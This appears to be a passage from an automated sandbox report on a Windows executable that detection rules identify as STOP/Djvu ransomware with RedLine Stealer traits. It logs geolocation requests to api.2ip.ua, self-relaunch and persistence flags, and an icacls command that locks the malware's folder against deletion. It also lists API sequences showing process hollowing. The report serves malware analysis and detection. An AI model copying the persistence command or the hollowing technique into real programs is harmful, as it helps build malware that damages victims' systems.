                              access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TNDfMSR%2BqeW427ipbORtoOHrE4dG1FkAjQg%2BxByBvQJSrDEo6jc9X1BdM51%2B41lRsnVqpn1NLAZY%2FebImJvQGZj1okuOZ1WdDehmooN748PKQEKynBBUbYvP%2Bixu"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b96edc6bd84190a-EWR
                              alt-svc: h3=":443"; ma=86400
                              2024-08-26 21:31:27 UTC | 418 | IN | Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
                              2024-08-26 21:31:27 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              4 | 192.168.2.6 | 52638 | 188.114.97.3 | 443 | 1492 | C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe
                              Timestamp | Bytes transferred | Direction | Data
                              2024-08-26 21:31:34 UTC | 85 | OUT | GET /geo.json HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: api.2ip.ua
                              2024-08-26 21:31:34 UTC | 889 | IN | HTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 21:31:34 GMT
                              Content-Type: application/json
                              Transfer-Encoding: chunked
                              Connection: close
                              strict-transport-security: max-age=63072000; preload
                              x-frame-options: SAMEORIGIN
                              x-content-type-options: nosniff
                              x-xss-protection: 1; mode=block; report=...
                              access-control-allow-origin: *
                              access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                              access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tzltbxw7TwBhqtz0ijWiksnu7l2NPQ2k5huK%2FngtfWoG77vEjRxyWW1sjzifh1zTXEK5%2BTIXV5NF5li%2Fs9rIRoZOCvOH728z4X4tP6jrlPNGIr3sZO6XDzBivuAq"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b96edf3a9166a52-EWR
                              alt-svc: h3=":443"; ma=86400
                              2024-08-26 21:31:34 UTC | 418 | IN | Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
                              2024-08-26 21:31:34 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Target ID:0
                              Start time:17:31:02
                              Start date:26/08/2024
                              Path:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\tsnsd8pOvn.exe"
                              Imagebase:0x400000
                              File size:820'736 bytes
                              MD5 hash:04E42207DB45792CAE0F6D3FD83F0680
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2147222942.0000000002178000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                              Reputation:low
                              Has exited:true

                              Target ID:2
                              Start time:17:31:06
                              Start date:26/08/2024
                              Path:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\tsnsd8pOvn.exe"
                              Imagebase:0x400000
                              File size:820'736 bytes
                              MD5 hash:04E42207DB45792CAE0F6D3FD83F0680
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                              Reputation:low
                              Has exited:true

                              Target ID:4
                              Start time:17:31:08
                              Start date:26/08/2024
                              Path:C:\Windows\SysWOW64\icacls.exe
                              Wow64 process (32bit):true
                              Commandline:icacls "C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                              Imagebase:0x340000
                              File size:29'696 bytes
                              MD5 hash:2E49585E4E08565F52090B144062F97E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:5
                              Start time:17:31:08
                              Start date:26/08/2024
                              Path:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\tsnsd8pOvn.exe" --Admin IsNotAutoStart IsNotTask
                              Imagebase:0x400000
                              File size:820'736 bytes
                              MD5 hash:04E42207DB45792CAE0F6D3FD83F0680
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2213957997.0000000002164000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                              Reputation:low
                              Has exited:true

                              Target ID:6
                              Start time:17:31:09
                              Start date:26/08/2024
                              Path:C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe --Task
                              Imagebase:0x400000
                              File size:820'736 bytes
                              MD5 hash:04E42207DB45792CAE0F6D3FD83F0680
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.2240762289.0000000002088000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 87%, ReversingLabs
                              Reputation:low
                              Has exited:true

                              Target ID:7
                              Start time:17:31:13
                              Start date:26/08/2024
                              Path:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\tsnsd8pOvn.exe" --Admin IsNotAutoStart IsNotTask
                              Imagebase:0x400000
                              File size:820'736 bytes
                              MD5 hash:04E42207DB45792CAE0F6D3FD83F0680
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000007.00000002.3368265368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000007.00000002.3368265368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000007.00000002.3368265368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                              Reputation:low
                              Has exited:false

                              Target ID:8
                              Start time:17:31:15
                              Start date:26/08/2024
                              Path:C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe --Task
                              Imagebase:0x400000
                              File size:820'736 bytes
                              MD5 hash:04E42207DB45792CAE0F6D3FD83F0680
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000002.3368713688.00000000006D7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000002.3368242009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000008.00000002.3368242009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000008.00000002.3368242009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                              Reputation:low
                              Has exited:false

                              Target ID:10
                              Start time:17:31:21
                              Start date:26/08/2024
                              Path:C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe" --AutoStart
                              Imagebase:0x400000
                              File size:820'736 bytes
                              MD5 hash:04E42207DB45792CAE0F6D3FD83F0680
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000A.00000002.2339633794.0000000002147000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000A.00000002.2340871565.0000000002250000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000A.00000002.2340871565.0000000002250000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                              Reputation:low
                              Has exited:true

                              Target ID:11
                              Start time:17:31:25
                              Start date:26/08/2024
                              Path:C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe" --AutoStart
                              Imagebase:0x400000
                              File size:820'736 bytes
                              MD5 hash:04E42207DB45792CAE0F6D3FD83F0680
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000B.00000002.2353527786.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000B.00000002.2353527786.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000B.00000002.2353527786.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                              Reputation:low
                              Has exited:true

                              Target ID:12
                              Start time:17:31:29
                              Start date:26/08/2024
                              Path:C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe" --AutoStart
                              Imagebase:0x400000
                              File size:820'736 bytes
                              MD5 hash:04E42207DB45792CAE0F6D3FD83F0680
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000C.00000002.2413321844.000000000067E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000C.00000002.2413430866.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000C.00000002.2413430866.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                              Reputation:low
                              Has exited:true

                              Target ID:13
                              Start time:17:31:33
                              Start date:26/08/2024
                              Path:C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe" --AutoStart
                              Imagebase:0x400000
                              File size:820'736 bytes
                              MD5 hash:04E42207DB45792CAE0F6D3FD83F0680
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000D.00000002.2423749353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000D.00000002.2423749353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000D.00000002.2423749353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                              Reputation:low
                              Has exited:true


                                Execution Graph

                                Execution Coverage:1.1%
                                Dynamic/Decrypted Code Coverage:22.6%
                                Signature Coverage:43.5%
                                Total number of Nodes:168
                                Total number of Limit Nodes:20

                                Control-flow Graph

                                APIs
                                • lstrlenA.KERNEL32(004BF940), ref: 0041F471
                                • GetWindowInfo.USER32(00000000,00000000), ref: 0041F486
                                • _memset.LIBCMT ref: 0041F4AE
                                • __vsnprintf.LIBCMTD ref: 0041F4CA
                                  • Part of subcall function 0041F0E0: __vswprintf_c_l.LIBCMTD ref: 0041F0F5
                                • _wscanf.LIBCMTD ref: 0041F4DA
                                  • Part of subcall function 004017C0: _vwscanf.LIBCMTD ref: 004017DB
                                • __wrename.LIBCMTD ref: 0041F4E6
                                  • Part of subcall function 00401460: MoveFileA.KERNEL32(?,?), ref: 0040146E
                                  • Part of subcall function 00401460: GetLastError.KERNEL32 ref: 00401478
                                  • Part of subcall function 00401460: __dosmaperr.LIBCMTD ref: 00401494
                                  • Part of subcall function 00401F40: __wcstoi64.LIBCMTD ref: 00401F4D
                                • _realloc.LIBCMTD ref: 0041F4FC
                                  • Part of subcall function 00401F60: __realloc_dbg.LIBCMTD ref: 00401F74
                                • _realloc.LIBCMTD ref: 0041F508
                                • __wctomb_s_l.LIBCMTD ref: 0041F51A
                                • GlobalAlloc.KERNEL32(00000000,00000000), ref: 0041F58F
                                • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041F59D
                                • GetLastError.KERNEL32 ref: 0041F5A3
                                • GetFileAttributesW.KERNEL32(00000000), ref: 0041F5E0
                                • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 0041F5FC
                                • GetProfileStringW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041F611
                                • ExitProcess.KERNEL32 ref: 0041F66C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: ErrorFileLast_realloc$AllocAttributesExitGlobalInfoMoveOverlappedPathProcessProfileResultSearchStringWindow__dosmaperr__realloc_dbg__vsnprintf__vswprintf_c_l__wcstoi64__wctomb_s_l__wrename_memset_vwscanf_wscanflstrlen
                                • String ID: ";$&$LocalAlloc$fataravozudasikeluxuki$kernel32.dll$l
                                • API String ID: 3938695757-2103127473
                                • Opcode ID: dd37b7728e499cc6eaaf672d71664c75f0b72b3e7d85b2c73e2fbaf15ac110ed
                                • Instruction ID: 4f550f754245fe67c4af6608bfee8406fb4c8ee18d4ff5a11aef943ca236083b
                                • Opcode Fuzzy Hash: dd37b7728e499cc6eaaf672d71664c75f0b72b3e7d85b2c73e2fbaf15ac110ed
                                • Instruction Fuzzy Hash: 6CC17170A44214DBEB709F61EC06BD877B1FB14705F1080BAE509662D1DBB85ACACF5E

                                Control-flow Graph

                                APIs
                                • GetConsoleFontSize.KERNEL32(00000000,00000000), ref: 0041F24C
                                • DisconnectNamedPipe.KERNEL32(00000000), ref: 0041F25A
                                • GetLocalTime.KERNEL32(00000000), ref: 0041F262
                                • GetLastError.KERNEL32 ref: 0041F268
                                • GetCommandLineW.KERNEL32 ref: 0041F27A
                                • OpenWaitableTimerW.KERNEL32(00000000,00000000,Bim tog getarat), ref: 0041F289
                                • WritePrivateProfileStructA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0041F299
                                • ScrollConsoleScreenBufferW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041F2AB
                                • GetConsoleCursorInfo.KERNEL32(00000000,00000000), ref: 0041F300
                                • SetConsoleActiveScreenBuffer.KERNEL32(00000000), ref: 0041F308
                                • GlobalFlags.KERNEL32(00000000), ref: 0041F310
                                • GetBinaryTypeA.KERNEL32(00000000,?), ref: 0041F353
                                • RaiseException.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041F379
                                • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 0041F385
                                • GetOEMCP.KERNEL32 ref: 0041F38B
                                • SetCommMask.KERNEL32(00000000,00000000), ref: 0041F3B9
                                • GetTapeParameters.KERNEL32(00000000,00000000,?,00000000), ref: 0041F3CC
                                • VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041F3DA
                                • GetCurrentDirectoryW.KERNEL32(00000000,?), ref: 0041F3E9
                                • SetComputerNameW.KERNEL32(00000000), ref: 0041F3F1
                                • GetProcessPriorityBoost.KERNEL32(00000000,00000000), ref: 0041F3FB
                                • GlobalWire.KERNEL32(?), ref: 0041F408
                                • SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0041F412
                                • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0041F41E
                                • GetProfileSectionA.KERNEL32(00000000,?,00000000), ref: 0041F42F
                                • SetEndOfFile.KERNEL32(00000000), ref: 0041F437
                                • ExitProcess.KERNEL32 ref: 0041F43F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: Console$BufferFileGlobalProcessProfileScreen$ActiveAllocBinaryBoostCommCommandComputerCopyCreateCurrentCursorDirectoryDisconnectEnvironmentErrorExceptionExitFlagsFontHeapInfoLastLineLocalMaskNameNamedOpenParametersPipePriorityPrivateRaiseScrollSectionSizeStructTapeTimeTimerTypeVariableVirtualWaitableWireWrite
                                • String ID: Bim tog getarat
                                • API String ID: 643654911-2360557851
                                • Opcode ID: f35ea94cc5e67399b8898cc5c821b8b0caa1efff50dee3e964a7a5f634125c71
                                • Instruction ID: 0622a81d1c84dbda579c4d18b33655a96495b3e6e3a908812a9475f4f6a8f037
                                • Opcode Fuzzy Hash: f35ea94cc5e67399b8898cc5c821b8b0caa1efff50dee3e964a7a5f634125c71
                                • Instruction Fuzzy Hash: 2051FD71B44304EBF7609BA0ED0AFA876B4BB04B06F504069F709AA1D2C7B55586CF1E

                                Control-flow Graph

                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 02210156
                                • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0221016C
                                • CreateProcessA.KERNELBASE(?,00000000), ref: 02210255
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02210270
                                • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02210283
                                • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0221029F
                                • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 022102C8
                                • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 022102E3
                                • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 02210304
                                • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0221032A
                                • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 02210399
                                • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 022103BF
                                • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 022103E1
                                • ResumeThread.KERNELBASE(00000000), ref: 022103ED
                                • ExitProcess.KERNEL32(00000000), ref: 02210412
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                • String ID:
                                • API String ID: 93872480-0

                                Control-flow Graph

                                control_flow_graph 225 21787c6-21787df 226 21787e1-21787e3 225->226 227 21787e5 226->227 228 21787ea-21787f6 CreateToolhelp32Snapshot 226->228 227->228 229 2178806-2178813 Module32First 228->229 230 21787f8-21787fe 228->230 231 2178815-2178816 call 2178485 229->231 232 217881c-2178824 229->232 230->229 237 2178800-2178804 230->237 235 217881b 231->235 235->232 237->226 237->229
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 021787EE
                                • Module32First.KERNEL32(00000000,00000224), ref: 0217880E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147222942.0000000002178000.00000040.00000020.00020000.00000000.sdmp, Offset: 02178000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2178000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                • String ID:
                                • API String ID: 3833638111-0

                                Control-flow Graph

                                APIs
                                • _check_managed_app.LIBCMTD ref: 004020BC
                                • __heap_init.LIBCMTD ref: 004020C6
                                  • Part of subcall function 0040D700: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,004020CB,00000001), ref: 0040D716
                                • _fast_error_exit.LIBCMTD ref: 004020D4
                                  • Part of subcall function 00402220: ___crtExitProcess.LIBCMTD ref: 00402244
                                • _fast_error_exit.LIBCMTD ref: 004020E7
                                • __RTC_Initialize.LIBCMTD ref: 004020F9
                                • ___crtGetEnvironmentStringsW.LIBCMTD ref: 00402122
                                • ___wsetargv.LIBCMTD ref: 0040212C
                                • __wsetenvp.LIBCMTD ref: 0040213F
                                • __cinit.LIBCMTD ref: 00402154
                                • __wwincmdln.LIBCMTD ref: 00402171
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: ___crt_fast_error_exit$CreateEnvironmentExitHeapInitializeProcessStrings___wsetargv__cinit__heap_init__wsetenvp__wwincmdln_check_managed_app
                                • String ID: /F
                                • API String ID: 3184702096-1771194452

                                Control-flow Graph

                                control_flow_graph 198 2210420-22104f8 200 22104fa 198->200 201 22104ff-221053c CreateWindowExA 198->201 202 22105aa-22105ad 200->202 203 2210540-2210558 PostMessageA 201->203 204 221053e 201->204 205 221055f-2210563 203->205 204->202 205->202 206 2210565-2210579 205->206 206->202 208 221057b-2210582 206->208 209 2210584-2210588 208->209 210 22105a8 208->210 209->210 211 221058a-2210591 209->211 210->205 211->210 212 2210593-2210597 call 2210110 211->212 214 221059c-22105a5 212->214 214->210
                                APIs
                                • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 02210533
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateWindow
                                • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                • API String ID: 716092398-2341455598

                                Control-flow Graph

                                control_flow_graph 215 41ec90-41ed2e lstrcpyA GetProcAddress VirtualProtect
                                APIs
                                • lstrcpyA.KERNEL32(004BF940,WirteosBloclsk), ref: 0041ECA7
                                • GetProcAddress.KERNEL32(?,004BF940), ref: 0041ED05
                                • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0041ED25
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: AddressProcProtectVirtuallstrcpy
                                • String ID: @$WirteosBloclsk
                                • API String ID: 1791291344-443665712

                                Control-flow Graph

                                control_flow_graph 216 22105b0-22105d5 217 22105dc-22105e0 216->217 218 22105e2-22105f5 GetFileAttributesA 217->218 219 221061e-2210621 217->219 220 2210613-221061c 218->220 221 22105f7-22105fe 218->221 220->217 221->220 222 2210600-221060b call 2210420 221->222 224 2210610 222->224 224->220
                                APIs
                                • GetFileAttributesA.KERNELBASE(apfHQ), ref: 022105EC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
